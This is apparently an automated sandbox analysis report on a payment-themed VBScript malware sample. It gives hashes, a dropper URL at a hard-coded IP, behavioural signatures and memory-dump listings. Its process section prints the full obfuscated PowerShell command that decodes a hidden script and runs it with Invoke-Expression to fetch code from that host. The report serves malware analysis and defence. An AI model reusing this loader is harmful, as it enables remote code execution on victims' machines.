Analysis
-
max time kernel
76s -
max time network
21s -
platform
windows7_x64 -
resource
win7-en-20210920 -
submitted
20-09-2021 18:25
Static task
static1
Behavioral task
behavioral1
Sample
INTERAC PAYMENT.vbs
Resource
win7-en-20210920
windows7_x64
0 signatures
0 seconds
General
-
Target
INTERAC PAYMENT.vbs
-
Size
7KB
-
MD5
f3bc5f7625cfb7d4f44f784561b05faf
-
SHA1
8831e8de10c1365cbc23bf50b96b6292fd09af29
-
SHA256
9b08fe9109b0e4b68f52624894d0ea9261f4a434f07d022f2d2b2d7c12877460
-
SHA512
cd5a57d361c02aeda535d19461798d9b5779f94e17aa12cc2ee9db4ba1605a8ce8fe04dcf4a1bee312261902a7c2bb579cc916f98576d679ded10a6c64807665
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
http://13.112.210.240/NJNJNJNJbypass.txt
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 1580 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1580 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
WScript.exedescription pid process target process PID 1424 wrote to memory of 1580 1424 WScript.exe powershell.exe PID 1424 wrote to memory of 1580 1424 WScript.exe powershell.exe PID 1424 wrote to memory of 1580 1424 WScript.exe powershell.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\INTERAC PAYMENT.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $SZXDCFVGBHNJSDFGH = 'http://13HHHHHHHHHHHHH112HHHHHHHHHHHHH210HHHHHHHHHHHHH240/NJNJNJNJbypassHHHHHHHHHHHHHtxt'.Replace('HHHHHHHHHHHHH','.');$SOS='%!HHHHHHHHHHH!5HHHHHHHHHHH!!HHHHHHHHHHH5%HHHHHHHHHHH!*HHHHHHHHHHH!7HHHHHHHHHHH!8HHHHHHHHHHH!eHHHHHHHHHHH!aHHHHHHHHHHH!dHHHHHHHHHHH!bHHHHHHHHHHH!!HHHHHHHHHHH!5HHHHHHHHHHH!*HHHHHHHHHHH!7HHHHHHHHHHH!8HHHHHHHHHHH!aHHHHHHHHHHH%0HHHHHHHHHHH3dHHHHHHHHHHH%0HHHHHHHHHHH%7HHHHHHHHHHH*eHHHHHHHHHHH!5HHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH!5HHHHHHHHHHH*%HHHHHHHHHHH!3HHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH5!HHHHHHHHHHH%7HHHHHHHHHHH%eHHHHHHHHHHH5%HHHHHHHHHHH*5HHHHHHHHHHH70HHHHHHHHHHH*cHHHHHHHHHHH*1HHHHHHHHHHH*3HHHHHHHHHHH*5HHHHHHHHHHH%8HHHHHHHHHHH%7HHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%7HHHHHHHHHHH%cHHHHHHHHHHH%7HHHHHHHHHHH7!HHHHHHHHHHH%eHHHHHHHHHHH57HHHHHHHHHHH%7HHHHHHHHHHH%9HHHHHHHHHHH%eHHHHHHHHHHH5%HHHHHHHHHHH*5HHHHHHHHHHH70HHHHHHHHHHH*cHHHHHHHHHHH*1HHHHHHHHHHH*3HHHHHHHHHHH*5HHHHHHHHHHH%8HHHHHHHHHHH%7HHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%bHHHHHHHHHHH%7HHHHHHHHHHH%cHHHHHHHHHHH%7HHHHHHHHHHH*cHHHHHHHHHHH!9HHHHHHHHHHH!5HHHHHHHHHHH!eHHHHHHHHHHH%7HHHHHHHHHHH%9HHHHHHHHHHH3bHHHHHHHHHHH0aHHHHHHHHHHH%!HHHHHHHHHHH53HHHHHHHHHHH58HHHHHHHHHHH!!HHHHHHHHHHH!3HHHHHHHHHHH!*HHHHHHHHHHH5*HHHHHHHHHHH!7HHHHHHHHHHH!%HHHHHHHHHHH!8HHHHHHHHHHH!eHHHHHHHHHHH!aHHHHHHHHHHH58HHHHHHHHHHH!!HHHHHHHHHHH!3HHHHHHHHHHH!*HHHHHHHHHHH5*HHHHHHHHHHH!7HHHHHHHHHHH!%HHHHHHHHHHH!8HHHHHHHHHHH!aHHHHHHHHHHH!bHHHHHHHHHHH%0HHHHHHHHHHH3dHHHHHHHHHHH%0HHHHHHHHHHH%7HHHHHHHHHHH!!HHHHHHHHHHH!fHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH*1HHHHHHHHHHH!!HHHHHHHHHHH53HHHHHHHHHHH5!HHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH!7HHHHHHHHHHH%7HHHHHHHHHHH%eHHHHHHHHHHH5%HHHHHHHHHHH*5HHHHHHHHHHH70HHHHHHHHHHH*cHHHHHHHHHHH*1HHHHHHHHHHH*3HHHHHHHHHHH*5HHHHHHHHHHH%8HHHHHHHHHHH%7HHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%aHHHHHHHHHHH%7HHHHHHHHHHH%cHHHHHHHHHHH%7HHHHHHHHHHH57HHHHHHHHHHH*eHHHHHHHHHHH!cHHHHHHHHHHH*fHHHHHHHHHHH%7HHHHHHHHHHH%9HHHHHHHHHHH%eHHHHHHHHHHH5%HHHHHHHHHHH*5HHHHHHHHHHH70HHHHHHHHHHH*cHHHHHHHHHHH*1HHHHHHHHHHH*3HHHHHHHHHHH*5HHHHHHHHHHH%8HHHHHHHHHHH%7HHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH%7HHHHHHHHHHH%cHHHHHHHHHHH%7HHHHHHHHHHH7%HHHHHHHHHHH!9HHHHHHHHHHH*eHHHHHHHHHHH%7HHHHHHHHHHH%9HHHHHHHHHHH3bHHHHHHHHHHH0aHHHHHHHHHHH%!HHHHHHHHHHH53HHHHHHHHHHH57HHHHHHHHHHH58HHHHHHHHHHH!!HHHHHHHHHHH!5HHHHHHHHHHH!3HHHHHHHHHHH5%HHHHHHHHHHH!*HHHHHHHHHHH!7HHHHHHHHHHH59HHHHHHHHHHH!8HHHHHHHHHHH55HHHHHHHHHHH!aHHHHHHHHHHH!9HHHHHHHHHHH53HHHHHHHHHHH!!HHHHHHHHHHH!*HHHHHHHHHHH5*HHHHHHHHHHH!7HHHHHHHHHHH!8HHHHHHHHHHH!aHHHHHHHHHHH%0HHHHHHHHHHH3dHHHHHHHHHHH%7HHHHHHHHHHH!9HHHHHHHHHHH*0HHHHHHHHHHH!5HHHHHHHHHHH58HHHHHHHHHHH%8HHHHHHHHHHH*eHHHHHHHHHHH*0HHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH*0HHHHHHHHHHH*3HHHHHHHHHHH*0HHHHHHHHHHH5!HHHHHHHHHHH%0HHHHHHHHHHH%!HHHHHHHHHHH!5HHHHHHHHHHH!!HHHHHHHHHHH5%HHHHHHHHHHH!*HHHHHHHHHHH!7HHHHHHHHHHH!8HHHHHHHHHHH!eHHHHHHHHHHH!aHHHHHHHHHHH!dHHHHHHHHHHH!bHHHHHHHHHHH!!HHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH!7HHHHHHHHHHH!%HHHHHHHHHHH!8HHHHHHHHHHH!eHHHHHHHHHHH!aHHHHHHHHHHH53HHHHHHHHHHH!!HHHHHHHHHHH!*HHHHHHHHHHH!7HHHHHHHHHHH!8HHHHHHHHHHH%9HHHHHHHHHHH%7HHHHHHHHHHH%eHHHHHHHHHHH5%HHHHHHHHHHH*5HHHHHHHHHHH70HHHHHHHHHHH*cHHHHHHHHHHH*1HHHHHHHHHHH*3HHHHHHHHHHH*5HHHHHHHHHHH%8HHHHHHHHHHH%7HHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%dHHHHHHHHHHH%7HHHHHHHHHHH%cHHHHHHHHHHH%7HHHHHHHHHHH*5HHHHHHHHHHH*0HHHHHHHHHHH57HHHHHHHHHHH*0HHHHHHHHHHH%dHHHHHHHHHHH!fHHHHHHHHHHH*%HHHHHHHHHHH*aHHHHHHHHHHH*0HHHHHHHHHHH!5HHHHHHHHHHH%7HHHHHHHHHHH%9HHHHHHHHHHH%eHHHHHHHHHHH5%HHHHHHHHHHH*5HHHHHHHHHHH70HHHHHHHHHHH*cHHHHHHHHHHH*1HHHHHHHHHHH*3HHHHHHHHHHH*5HHHHHHHHHHH%8HHHHHHHHHHH%7HHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3cHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH3eHHHHHHHHHHH%7HHHHHHHHHHH%cHHHHHHHHHHH%7HHHHHHHHHHH!5HHHHHHHHHHH!*HHHHHHHHHHH!7HHHHHHHHHHH!8HHHHHHHHHHH!aHHHHHHHHHHH%9HHHHHHHHHHH%eHHHHHHHHHHH%!HHHHHHHHHHH53HHHHHHHHHHH58HHHHHHHHHHH!!HHHHHHHHHHH!3HHHHHHHHHHH!*HHHHHHHHHHH5*HHHHHHHHHHH!7HHHHHHHHHHH!%HHHHHHHHHHH!8HHHHHHHHHHH!eHHHHHHHHHHH!aHHHHHHHHHHH58HHHHHHHHHHH!!HHHHHHHHHHH!3HHHHHHHHHHH!*HHHHHHHHHHH5*HHHHHHHHHHH!7HHHHHHHHHHH!%HHHHHHHHHHH!8HHHHHHHHHHH!aHHHHHHHHHHH!bHHHHHHHHHHH%8HHHHHHHHHHH%!HHHHHHHHHHH53HHHHHHHHHHH5aHHHHHHHHHHH58HHHHHHHHHHH!!HHHHHHHHHHH!3HHHHHHHHHHH!*HHHHHHHHHHH5*HHHHHHHHHHH%7HHHHHHHHHHH%9HHHHHHHHHHH3bHHHHHHHHHHH0aHHHHHHHHHHH%*HHHHHHHHHHH%8HHHHHHHHHHH%7HHHHHHHHHHH!9HHHHHHHHHHH%7HHHHHHHHHHH%bHHHHHHHHHHH%7HHHHHHHHHHH!5HHHHHHHHHHH58HHHHHHHHHHH%7HHHHHHHHHHH%9HHHHHHHHHHH%8HHHHHHHHHHH%!HHHHHHHHHHH53HHHHHHHHHHH57HHHHHHHHHHH58HHHHHHHHHHH!!HHHHHHHHHHH!5HHHHHHHHHHH!3HHHHHHHHHHH5%HHHHHHHHHHH!*HHHHHHHHHHH!7HHHHHHHHHHH59HHHHHHHHHHH!8HHHHHHHHHHH55HHHHHHHHHHH!aHHHHHHHHHHH!9HHHHHHHHHHH53HHHHHHHHHHH!!HHHHHHHHHHH!*HHHHHHHHHHH5*HHHHHHHHHHH!7HHHHHHHHHHH!8HHHHHHHHHHH!aHHHHHHHHHHH%0HHHHHHHHHHH%dHHHHHHHHHHH!aHHHHHHHHHHH*fHHHHHHHHHHH*9HHHHHHHHHHH*eHHHHHHHHHHH%0HHHHHHHHHHH%7HHHHHHHHHHH%7HHHHHHHHHHH%9HHHHHHHHHHH7cHHHHHHHHHHH%*HHHHHHHHHHH%8HHHHHHHHHHH%7HHHHHHHHHHH!9HHHHHHHHHHH%7HHHHHHHHHHH%bHHHHHHHHHHH%7HHHHHHHHHHH!5HHHHHHHHHHH58HHHHHHHHHHH%7HHHHHHHHHHH%9HHHHHHHHHHH3b'.Replace('%','2').Replace('!','4').Replace('*','6');Invoke-Expression (-join ($SOS -split 'HHHHHHHHHHH' | ? { $_ } | % { [char][convert]::ToUInt32($_,16) }))2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/1424-53-0x000007FEFBB51000-0x000007FEFBB53000-memory.dmpFilesize
8KB
-
memory/1580-54-0x0000000000000000-mapping.dmp
-
memory/1580-56-0x000007FEF1FC0000-0x000007FEF2B1D000-memory.dmpFilesize
11.4MB
-
memory/1580-59-0x0000000002584000-0x0000000002587000-memory.dmpFilesize
12KB
-
memory/1580-60-0x000000000258B000-0x00000000025AA000-memory.dmpFilesize
124KB
-
memory/1580-58-0x0000000002582000-0x0000000002584000-memory.dmpFilesize
8KB
-
memory/1580-57-0x0000000002580000-0x0000000002582000-memory.dmpFilesize
8KB